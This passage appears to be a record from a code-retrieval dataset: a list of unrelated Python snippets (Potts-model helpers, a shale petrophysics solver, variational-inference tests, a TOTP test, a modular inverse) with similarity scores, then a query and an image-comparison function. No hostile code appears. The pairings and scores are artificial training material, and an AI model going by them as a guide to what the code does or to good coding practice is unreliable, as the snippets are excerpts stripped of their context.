\"81099144573950922883933823309397903831307729923277144841334749422315595743437219371821139976270089085817737914449263008752457618988770955139245864971428025146021819160336876692205993068777078938240475549226164124952577975303221660397947822711916352061614341728562734417872584743294922245761212731150483802964283263230741041446988298186702952974697967148198190463075071628059974486966250538161512056563568090071474143434146441589514816635339916481756264419884177841781745530245175458079612447970067897693825433138760936325168807521204548329680909932742314536162869895548442852131478295912996232046258690790851591666552\"),\n self.modulo, self.order())", "def nits(self):", "def define_potts_helper_functions(k):\n\n @njit\n def calc_observables(X, k=k):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n\n Returns\n -------\n ndarray\n Dimensions (n_samples, 
n_observables).\n \"\"\"\n\n n = X.shape[1]\n Y = np.zeros((len(X), n*k+n*(n-1)//2), dtype=np.int8)\n \n # average orientation (magnetization)\n # note that fields for the third state are often set to 0\n counter = 0\n for i in range(k):\n for j in range(n):\n Y[:,counter] = X[:,j]==i\n counter += 1\n \n # pairwise correlations\n for i in range(n-1):\n for j in range(i+1, n):\n Y[:,counter] = X[:,i]==X[:,j]\n counter += 1\n \n return Y\n\n def calc_e(X, multipliers, k=k, calc_observables=calc_observables):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n multipliers : ndarray of dtype np.float64\n\n Returns\n -------\n ndarray\n Energies of each observable.\n \"\"\"\n\n return -calc_observables(X, k).dot(multipliers)\n\n def mch_approximation(sample, dlamda, calc_e=calc_e):\n \"\"\"Function for making MCH approximation step for Potts model.\n \n Parameters\n ----------\n sample : ndarray\n Of dimensions (n_sample, n_spins).\n dlamda : ndarray\n Change in parameters.\n \n Returns\n -------\n ndarray\n Predicted correlations.\n \"\"\"\n\n dE = calc_e(sample, dlamda)\n ZFraction = len(dE) / np.exp(logsumexp(-dE))\n predsisj = (np.exp(-dE[:,None]) / len(dE) * calc_observables(sample)).sum(0) * ZFraction \n assert not ((predsisj<0).any() or\n (predsisj>(1+1e-10)).any()),\"Predicted values are beyond limits, (%E,%E)\"%(predsisj.min(),\n predsisj.max())\n return predsisj\n\n return calc_e, calc_observables, mch_approximation", "def ORM2(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix 
Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dk,Dpf],[HIc1,HIk,HIpf],[1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=0.000 # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[1] # Volume of organic component\n\t\tPHIe=XMatrix[2] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. 
Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def run_test(d):\n\n ######### Problem Specification\n\n # Data generation parameters\n prior_mu_z = np.zeros(d, dtype=np.float32) # Prior mean\n prior_sigma_z = np.eye(d, dtype=np.float32) # Prior covariance matrix\n\n # True model parameters\n num_range = np.arange(-(d-1)/2, (d+1)/2, dtype=np.float32)\n\n t_delta = num_range / 5 \n\n if d == 1:\n t_sigma = np.ones(1)\n else: \n # Allow sigma to range from 0.1 to 1\n t_sigma = 36/(10*(d-1)**2) * num_range**2 + 0.1 \n\n ######### Variable Initialization\n\n # Initial model parameters - same across all methods\n init_delta = prior_mu_z.copy()\n init_log_sigma = 3 * np.ones(d)\n\n # Initial HVAE variational parameters\n init_T = 5.\n init_eps = 0.005 * np.ones(d)\n max_eps = params['max_eps'] * np.ones(d)\n init_logit_eps = np.log(init_eps/(max_eps - init_eps))\n init_log_T_0 = np.log(init_T - 1)\n\n # Initial NF variational parameters\n init_u_pre_reparam = scipy.stats.truncnorm.rvs(-2, 2, scale=0.1, size=d)\n init_w = scipy.stats.truncnorm.rvs(-2, 2, scale=0.1, size=d)\n init_b = 0.1\n\n # Initial VAE parameters\n init_mu_z = prior_mu_z.copy()\n init_log_sigma_z = np.ones(d)\n\n ######### Set up models\n\n HVAE_model_1 = HVAE(\n ['delta', 'log_sigma', 'logit_eps', 'log_T_0'],\n [init_delta, init_log_sigma, init_logit_eps, init_log_T_0], \n 'HVAE_1', d, params['HVAE_K_1'])\n HVAE_model_2 = HVAE(\n ['delta', 'log_sigma', 'logit_eps', 'log_T_0'],\n [init_delta, init_log_sigma, init_logit_eps, init_log_T_0], \n 'HVAE_2', d, params['HVAE_K_2'])\n\n HVAE_model_notemp_1 = HVAE(\n ['delta', 'log_sigma', 'logit_eps'],\n [init_delta, init_log_sigma, init_logit_eps], \n 'HVAE_notemp_1', d, params['HVAE_K_1'])\n HVAE_model_notemp_2 = HVAE(\n ['delta', 'log_sigma', 'logit_eps'], \n [init_delta, init_log_sigma, init_logit_eps],\n 'HVAE_notemp_2', d, params['HVAE_K_2'])\n\n NF_model_1 = NF(\n ['delta', 'log_sigma', 'u_pre_reparam', 'w', 'b'],\n [init_delta, init_log_sigma, init_u_pre_reparam, init_w, init_b],\n 'NF_1', d, params['NF_K_1'])\n NF_model_2 = NF(\n ['delta', 'log_sigma', 'u_pre_reparam', 'w', 'b'],\n [init_delta, init_log_sigma, init_u_pre_reparam, init_w, init_b],\n 'NF_2', d, params['NF_K_2'])\n\n VB_model = VB(['delta', 'log_sigma', 'mu_z', 'log_sigma_z'], \n [init_delta, init_log_sigma, init_mu_z, init_log_sigma_z], 'VB', d)\n\n model_list = [HVAE_model_1, HVAE_model_2, HVAE_model_notemp_1, \n HVAE_model_notemp_2, NF_model_1, NF_model_2, VB_model]\n \n ######### Generate Training Data & Save - One for each test\n\n train_data_list = []\n\n for i in range(params['n_tests']):\n z = np.random.multivariate_normal(prior_mu_z, prior_sigma_z)\n x = np.random.multivariate_normal(z + t_delta, np.diag(t_sigma**2), \n size=params['n_data'])\n train_data_list.append(x)\n\n # Folder should have already been created in the initializations\n data_path = os.path.join('save', str(d), 'train_data.p')\n pickle.dump(train_data_list, open(data_path, 'wb')) \n\n ######### Train models\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n # Store the final parameter values for all test runs in this dictionary\n final_params = {}\n\n for m in model_list:\n\n final_values = []\n\n for i in range(params['n_tests']):\n (delta, sigma) = m.train(sess, train_data_list[i], i)\n final_values.append((delta, sigma))\n\n 
final_params[m.model_name] = final_values.copy()\n\n ######### Test models using difference between parameters\n\n param_diffs = {}\n\n for m in model_list:\n\n diffs = []\n\n for i in range(params['n_tests']):\n delta = final_params[m.model_name][i][0]\n sigma = final_params[m.model_name][i][1]\n\n delta_diff = np.sum((delta - t_delta)**2)\n sigma_diff = np.sum((sigma - t_sigma)**2)\n\n diffs.append((delta_diff, sigma_diff))\n\n param_diffs[m.model_name] = diffs.copy()\n\n # Save parameter differences in a pickle file\n diff_path = os.path.join('save', str(d), 'all_diffs.p')\n pickle.dump(param_diffs, open(diff_path, 'wb'))", "def solveForModeB1(X, M, n, maxInner, epsilon, tol,sita,Y1, lambta2):\n # Pi(n) = [A(N) kr A(N-1) kr ... A(n+1) kr A(n-1) kr .. A(1)]^T\n Pi = tensorTools.calculatePi(X, M, n)\n #print 'Pi size', Pi.shape\n #print 'pi='+str(Pi)\n #print(M.U[n])\n for iter in range(maxInner):\n # Phi = (X(n) elem-div (B Pi)) Pi^T\n #print X.vals.shape,X.shape\n #print X.vals.flatten().shape\n Phi = tensorTools.calculatePhi(X, M.U[n], Pi, n, epsilon=epsilon)\n #print('phi'+str(Phi))\n #print(Phi)\n # check for convergence that min(B(n), E - Phi(n)) = 0 [or close]\n kktModeViolation = np.max(np.abs(np.minimum(M.U[n], 1-Phi).flatten()))\n if (kktModeViolation < tol):\n break\n\n B=M.U[n]\n #print B.shape\n colNorm = np.apply_along_axis(np.linalg.norm, 0, B, 1)\n zeroNorm = np.where(colNorm == 0)[0]\n colNorm[zeroNorm] = 1\n B = B / colNorm[np.newaxis, :]\n tm=np.hstack((np.ones((B.shape[0],1)),B))\n Y1=Y1.reshape((Y1.shape[0],1))\n\n derive=-1.0*lambta2/B.shape[0]*np.dot((Y1-np.dot(tm,sita)),sita.T)\n #print derive.shape\n #print np.multiply(M.U[n],derive[:,1:]).shape\n #print np.multiply(M.U[n],Phi).shape\n M.U[n] = np.array(np.multiply(M.U[n],Phi))-np.array((np.multiply(M.U[n],derive[:,1:])))\n\n #print 'after'\n #print M.U[n][0]\n #print(\" Mode={0}, Inner Iter={1}, KKT violation={2}\".format(n, iter, kktModeViolation))\n return M, Phi, iter, kktModeViolation", "def test_successful_verification(self):\n for i in (-2, -1, 0, 1, 2):\n\n description = \"TOTP not verified for `i={0}`\".format(i)\n calculated = self.algorithm.calculate(self.device.secret, drift=i)\n confirmed = self.relate.verify(calculated, save=False)\n\n self.assertTrue(confirmed, description)\n\n self.relate.confirm = False", "def test_T2():\n infile = \"cisd/T2.in\"\n assert(os.path.exists(infile))\n with open(infile) as f:\n lines = f.readlines()\n assert(len(lines) == 10)\n\n hl1 = HirataLine(lines[0])\n assert(set(hl1.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl1.summation_indices == '')\n assert(hl1.prefactors == [\"+ 1.0 \"])\n assert(hl1.postfactors == ['v ( p3 p4 h1 h2 )'])\n assert(str(hl1) == lines[0].replace('\\n', ''))\n cl1 = Cc4sLine(hl1)\n assert(set(cl1.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl1.summation_indices == \"\")\n assert(cl1.prefactors == [\"+ 1.0 \"])\n assert(cl1.postfactors == ['Vabij[\"cdij\"]'])\n assert(cl1.to_cpp() == ['( + 1.0 ) * Vabij[\"cdij\"];'])\n\n hl8 = HirataLine(lines[7])\n assert(set(hl8.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl8.summation_indices == ' h6 p5 ')\n assert(\n hl8.prefactors == [\n '+ 1.0 ',\n '- 1.0 * P( p3 p4 h2 h1 => p4 p3 h2 h1 ) ',\n '- 1.0 * P( p3 p4 h2 h1 => p3 p4 h1 h2 ) ',\n '+ 1.0 * P( p3 p4 h2 h1 => p4 p3 h1 h2 ) '\n ]\n )\n assert(\n hl8.postfactors ==\n ['Sum ( h6 p5 )', 't ( p5 p3 h6 h2 )', 'v ( h6 p4 h1 p5 )']\n )\n assert(str(hl8) == lines[7].replace('\\n', ''))\n cl8 = 
Cc4sLine(hl8)\n assert(set(cl8.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl8.summation_indices == \" n e \")\n assert(\n cl8.prefactors ==\n ['+ 1.0 ',\n '- 1.0 * P( c d j i => d c j i ) ',\n '- 1.0 * P( c d j i => c d i j ) ',\n '+ 1.0 * P( c d j i => d c i j ) ']\n )\n assert(cl8.postfactors == ['Tabij[\"ecnj\"]', 'Viajb[\"ndie\"]'])\n assert(\n cl8.to_cpp() == [\n '( + 1.0 ) * Tabij[\"ecnj\"] * Viajb[\"ndie\"];',\n '( - 1.0 ) * Tabij[\"ednj\"] * Viajb[\"ncie\"];',\n '( - 1.0 ) * Tabij[\"ecni\"] * Viajb[\"ndje\"];',\n '( + 1.0 ) * Tabij[\"edni\"] * Viajb[\"ncje\"];'\n ]\n )", "def Subtask4_pre_train_5():\n with open(PATH + 'pre_train_4_Subtask4.txt', encoding='utf-8') as fi:\n evi = eval(fi.read())\n\n train_data = np.load(PATH + 'pre_train_2_Subtask4.npy', allow_pickle=True).item()\n model = word2vec.KeyedVectors.load_word2vec_format(PATH + \"data/GoogleNews-vectors-negative300.bin\", binary=True)\n\n with open(PATH + 'pre_train_3_Subtask4.txt', encoding='utf-8') as f:\n document = eval(f.read())\n\n with open(PATH + 'traindata_Subtask4.txt', 'w') as fp:\n for data in train_data.items():\n claim = data[0]\n claim = re.sub(\"[-,.。:_=+*&^%$#@!?()<>/`';|]\", \"\", claim)\n claim = claim.split(' ')\n claim = list(filter(lambda x: x in model.vocab, claim))\n Vi = []\n for i in range(len(claim)):\n Vi.append(model[claim[i]])\n\n V = np.zeros(len(Vi[0]))\n for i in range(len(claim)):\n for j in range(len(Vi[0])):\n V[j] = V[j] + Vi[i][j]\n\n rms = 0\n for i in range(len(Vi[0])):\n rms += V[i] * V[i]\n rms = np.sqrt(rms / len(Vi[0]))\n\n for i in range(len(Vi[0])):\n V[i] = V[i] / rms\n V = V.astype(str).tolist()\n\n for doc in data[1]:\n lines = document[doc].split('\\n')\n for k in range(len(lines)):\n label = [data[0], doc, k]\n line = document[doc].split('\\n')[k]\n if line != str(k) + '\\t':\n line = line.replace(str(k) + '\\t', '')\n line = line.split('\\t')[0]\n line = re.sub(\"[-,.。:_=+*&^%$#@!?()<>/`';|]\", \"\", line)\n line = line.split(' ')\n line = list(filter(lambda x: x in model.vocab, line))\n if len(line) != 0:\n Vi = []\n for i in range(len(line)):\n Vi.append(model[line[i]])\n\n V1 = np.zeros(len(Vi[0]))\n for i in range(len(line)):\n for j in range(len(Vi[0])):\n V1[j] = V1[j] + Vi[i][j]\n\n rms = 0\n for i in range(len(Vi[0])):\n rms += V1[i] * V1[i]\n rms = np.sqrt(rms / len(Vi[0]))\n\n for i in range(len(Vi[0])):\n V1[i] = V1[i] / rms\n V1 = V1.astype(str).tolist()\n\n if label in evi:\n fp.write(' '.join(V) + ' ' + ' '.join(V1) + ' 1' + '\\n')\n else:\n fp.write(' '.join(V) + ' ' + ' '.join(V1) + ' 0' + '\\n')", "def eulerphi(n):\r\n\treturn euler_phi(n)", "def ev2vi_n(eV,mu):\n return np.sqrt(2.*eV*eV2J/(mu*mp))", "def inv_sym(self, ):\n m = self.m\n n = self.n\n kQ = self.kQ\n iQ = self.iQ\n iA = self.iA\n kA = self.kA\n kAt = self.kAt\n iAt = self.iAt\n bndmark = self.bndmark\n rngmark = self.rngmark\n\n verbose = self.verbose\n pdf = self.pdf\n\n separable = True\n degree = np.empty(n+m, dtype=np.int)\n nbrs = np.empty(n+m, dtype=object)\n\n #/*-----------------------------------------------------+\n #| First check to see if the problem is separable. 
*/\n\n for j in range(n):\n for k in range(kQ[j], kQ[j+1]):\n if iQ[k] != j:\n separable = False\n break\n\n #/*----------------------------------------------------+\n #| Select ordering priority (primal or dual) */\n\n\n _dense, _fraction, pfillin, dfillin = 0.0, 0.0, 0.0, 0.0\n\n _fraction = 1.0e0\n for j in range(n):\n _dense = float(kA[j+1]-kA[j])/(m+1)\n _fraction = _fraction*(1.0e0 - _dense*_dense)\n\n pfillin = 0.5*m*m*(1.0e0-_fraction)\n if verbose>2:\n print(\"primal fillin estimate: {:10.0f}\".format(pfillin))\n\n _fraction = 1.0e0\n for i in range(m):\n _dense = float(kAt[i+1]-kAt[i])/(n+1)\n _fraction = _fraction*(1.0e0 - _dense*_dense)\n\n dfillin = 0.5*n*n*(1.0e0-_fraction)\n if verbose>2:\n print(\"dual fillin estimate: {:10.0f}\\n\".format(dfillin))\n\n if pdf == self._UNSET:\n if 3*pfillin <= dfillin and separable:\n pdf = self._PRIMAL\n if verbose>2:\n print(\"Ordering priority favors PRIMAL\")\n else:\n pdf = self._DUAL\n if verbose>2:\n print(\"Ordering priority favors DUAL\")\n\n\n #/*----------------------------------------------+\n #| Initialize nbrs so that nbrs[col][k] con- |\n #| tains the row index of the k_th nonzero in |\n #| column col. |\n #| Initialize degree so that degree[col] con- |\n #| tains the number of nonzeros in column col. |\n #| */\n\n for j in range(n):\n ne = kA[j+1] - kA[j] + kQ[j+1] - kQ[j]\n nbrs[j] = np.empty(ne, dtype=np.int)\n ne = 0\n for k in range(kA[j], kA[j+1]):\n nbrs[j][ne] = n+iA[k]\n ne+=1\n for k in range(kQ[j],kQ[j+1]):\n if iQ[k] != j:\n nbrs[j][ne] = iQ[k]\n ne+=1\n\n degree[j] = ne\n\n for i in range(m):\n ne = kAt[i+1] - kAt[i]\n nbrs[n+i] = np.empty(ne, dtype=np.int)\n degree[n+i] = ne\n ne = 0\n for k in range(kAt[i], kAt[i+1]):\n nbrs[n+i][ne] = iAt[k]\n ne+=1\n\n #/*----------------------------------------------+\n #| Initialize tier to contain the ordering |\n #| priority scheme. |\n #| */\n\n if self.tier is None:\n self.tier = np.empty(n+m, dtype=np.int)\n n1 = 0\n if pdf == self._PRIMAL:\n for j in range(n):\n if bndmark[j] != FREEVAR:\n self.tier[j] = 0 # 0\n else:\n self.tier[j] = 1 # 2\n\n for i in range(m):\n if rngmark[i] == UNCONST:\n self.tier[n+i] = 1 # 4\n n1+=1\n elif rngmark[i] == INFINITE:\n self.tier[n+i] = 1 # 1\n else:\n self.tier[n+i] = 1 # 3\n n1+=1\n\n else:\n for j in range(n):\n if bndmark[j] != FREEVAR:\n self.tier[j] = 1 # 1\n else:\n self.tier[j] = 1 # 3\n n1+=1\n\n for i in range(m):\n if rngmark[i] == UNCONST:\n self.tier[n+i] = 1 # 4\n elif rngmark[i] == INFINITE:\n self.tier[n+i] = 0 # 0\n else:\n self.tier[n+i] = 1 # 2\n\n\n #/*---------------------------------------------------------+\n #| compute maximum column degree of tier zero columns */\n\n if self.dense < 0:\n denfac = 3.0\n colhisto = np.zeros(n+m+1, dtype=np.int)\n\n for i in range(n+m):\n if self.tier[i] == 0:\n colhisto[ degree[i] ] += 1\n\n tot = 0\n _max = n1\n for i in range(n+m):\n tot += colhisto[i]\n if tot >= _max:\n break\n i+=1\n tot = 0\n cnt = 0\n for j in range(n+m):\n if self.tier[j] == 0:\n tot += degree[j]\n cnt+=1\n self.dense = dense = int(denfac*i)\n\n #dense = (int)(denfac*MAX(i,tot/cnt))\n \t\t#printf(\"i = %d, n = %d, m = %d, n1 = %d \\n\", i,n,m,n1)\n \t\t#printf(\"tot = %d, cnt = %d\\n\", tot, cnt)\n del(colhisto)\n\n\n if verbose>2:\n print(\"dense: {:5d}\".format(dense))\n\n #/*----------------------------------------------+\n #| Get memory for mark[]. 
*/\n\n self.mark = np.empty(n+m, dtype=np.int)\n\n self.lltsym(degree,nbrs)\n\n del(degree)\n del(nbrs)\n self.tier = None", "def V2E(V):\n# for v in m/s returns energy in meV\n return 5.227e-6*V*V", "def gen_proof(Tf, H):\n gr, xc, grLf0 = H\n phi = [(integer(0, G.q), grLf0)] + [(m, gr ** t) for m, t in Tf]\n Pf = LIexp(phi, xc)\n return Pf", "def _get_inverse_dynamics(self, t):\n\n # Note DL: The computation of the inverse dynamics is not optimized to be\n # maximally efficient. At the moment this is fine, because we only use this\n # with very small envs. If performance becomes an issue, the following points\n # could be changed:\n # - we still do some unnecessary converting between numpy and\n # scipy.sparse matrices, which negatively impacts performance\n # - it is very likely that the computations could be simplified\n # - instead of computing the inverse dynamics lazily for each timestep, we could\n # compute them eagerly, because we use all of the timesteps anyway.\n # This would improve readability and performance, because we would not have\n # to exponentiate `T_s_next_s` every time. (h/t Rohin)\n\n if t not in self.inverse_dynamics_by_time:\n if self.T_policy_matrix is None:\n raise Exception(\n \"Have to call `make_T_policy_matrix` before `get_inverse_dynamics`\"\n )\n\n # T_s_next_s = P(s' | s, a ~ \\pi)\n T_s_next_s = sum(self.T_policy_matrix[a] for a in range(self.env.nA))\n\n # P_t_s = P_t(s)\n # note that scipy.sparse implements * as matrix multiplication\n P_0_s = self.initial_state_distribution\n P_t_s = P_0_s * T_s_next_s ** t\n\n # P_t_s_a_next_s = P_t(s, a, s') = P(s' | s, a) * pi(a | s) * P_t(s)\n P_t_s_a_next_s = [\n sp.csr_matrix.multiply(self.T_policy_matrix[a], P_t_s.reshape((-1, 1)))\n for a in range(self.env.nA)\n ]\n\n # P_a_next_s = P_t(a, s') = \\sum_s P_t(s, a, s')\n P_t_a_next_s = np.vstack(\n [\n P_t_s_a_next_s[a].sum(axis=0).reshape((1, -1))\n for a in range(self.env.nA)\n ]\n )\n\n # ignore 0/0 errors (filled with 0 in next step)\n with np.errstate(invalid=\"ignore\"):\n # T_inv_t = \\tilde{T}_t(s | a, s') = P_t(s, a, s') / P_t(a, s')\n T_inv_t = [\n P_t_s_a_next_s[a] / P_t_a_next_s[a, :].reshape((1, -1))\n for a in range(self.env.nA)\n ]\n\n # policy_inv_t = \\tilde{\\pi}_t(a | s') = P_t(a, s') / \\sum_a P_t(a, s')\n policy_inv_t = P_t_a_next_s / P_t_a_next_s.sum(axis=0)\n\n # fill nans with 0\n T_inv_t = np.nan_to_num(T_inv_t)\n policy_inv_t = np.nan_to_num(policy_inv_t)\n\n T_inv_t = [sp.csr_matrix(T_inv_t[a]) for a in range(self.env.nA)]\n policy_inv_t = sp.csr_matrix(policy_inv_t)\n\n self.inverse_dynamics_by_time[t] = (T_inv_t, policy_inv_t)\n return self.inverse_dynamics_by_time[t]", "def prove_NA1() -> Proof:\n # Optional Task 6.9a", "def test_inverse( centering='SYMMETRIC'):\n\n\n npupil = 300 #156\n pctr = int(npupil/2)\n npix = 100 #1024\n u = 20 #100 # of lam/D\n\n npix, u = 2000, 200\n s = (npupil,npupil)\n\n\n\n\n mft1 = matrixDFT.MatrixFourierTransform(centering=centering)\n\n ctr = (float(npupil)/2.0, float(npupil)/2.0 )\n #print ctr\n pupil = makedisk(s=s, c=ctr, r=float(npupil)/2.0001, t=np.float64, grey=0)\n pupil /= np.sqrt(pupil.sum())\n\n pupil[100:200, 30:50] = 0\n pupil[0:50, 140:160] = 0\n\n plt.subplot(141)\n plt.imshow(pupil)\n\n print \"Pupil 1 total:\", pupil.sum() \n\n a = mft1.perform(pupil, u, npix)\n\n asf = a.real.copy()\n cpsf = a * a.conjugate()\n psf = cpsf.real.copy()\n print \"PSF total\", psf.sum()\n \n plt.subplot(142)\n plt.imshow(psf, norm=matplotlib.colors.LogNorm(1e-8, 1.0))\n\n plt.subplot(143)\n\n pupil2 = 
mft1.inverse(a, u, npupil)\n pupil2r = (pupil2 * pupil2.conjugate()).real\n plt.imshow( pupil2r)\n\n print \"Pupil 2 total:\", pupil2r.sum() \n\n\n\n a2 = mft1.perform(pupil2r, u, npix)\n psf2 = (a2*a2.conjugate()).real.copy()\n print \"PSF total\", psf2.sum()\n plt.subplot(144)\n plt.imshow(psf2, norm=matplotlib.colors.LogNorm(1e-8, 1.0))", "def eulerphi(n):\n\treturn euler_phi(n)", "def multInverse(a, m):\n x0 = 1\n x1 = 0\n y0 = 0\n y1 = 1\n\n while m != 0:\n p = a // m\n z = a % m\n a = m\n m = z\n\n w = x1\n x1 = x0 - p * x1\n x0 = w\n \n v = y1\n y1 = y0 - p * y1\n y0 = v\n if(x0):\n return(x0)\n else:\n print(\"multiplicative inverse does not exist\")\n return 0" ]
[ "0.5861715", "0.5764415", "0.5698264", "0.568726", "0.56142557", "0.55775875", "0.54205596", "0.54187477", "0.54100156", "0.5328907", "0.529744", "0.52744836", "0.5273768", "0.526851", "0.5267105", "0.52515525", "0.52438647", "0.5238269", "0.5230068", "0.5224255", "0.52228403", "0.52029735", "0.5194851", "0.5194589", "0.5194009", "0.5180759", "0.51772755", "0.5164743", "0.5145337", "0.51409656", "0.5130892", "0.5130459", "0.5120482", "0.5117446", "0.511679", "0.51151997", "0.5113399", "0.5112108", "0.5111069", "0.51069856", "0.5093601", "0.5081969", "0.5081521", "0.5077038", "0.50709206", "0.5069272", "0.5068255", "0.5062575", "0.5061713", "0.50558543", "0.50297266", "0.5027233", "0.50249094", "0.50245607", "0.5009905", "0.5008993", "0.5008022", "0.50072", "0.49980766", "0.49947757", "0.49834535", "0.49754158", "0.4974131", "0.4972373", "0.49638176", "0.4958542", "0.49578398", "0.49571082", "0.49552116", "0.4954507", "0.49534723", "0.49451163", "0.4938192", "0.4934233", "0.4933153", "0.49326843", "0.4926942", "0.49253172", "0.49241608", "0.49222016", "0.4915393", "0.49139938", "0.4913235", "0.4911765", "0.4910409", "0.49073678", "0.49042797", "0.49036947", "0.4900812", "0.48974645", "0.48953527", "0.48946428", "0.48944727", "0.48883662", "0.48797256", "0.48764238", "0.48745602", "0.48726723", "0.48719597", "0.487154", "0.48655492" ]
0.0
-1
Compares an image to its reference
def compare(self, reference, image):
    if not os.path.isfile(reference):
        raise PictureComparatorError("Reference file %s does not exist" % reference)
    if not os.path.isfile(image):
        raise PictureComparatorError("Image file %s does not exist" % image)
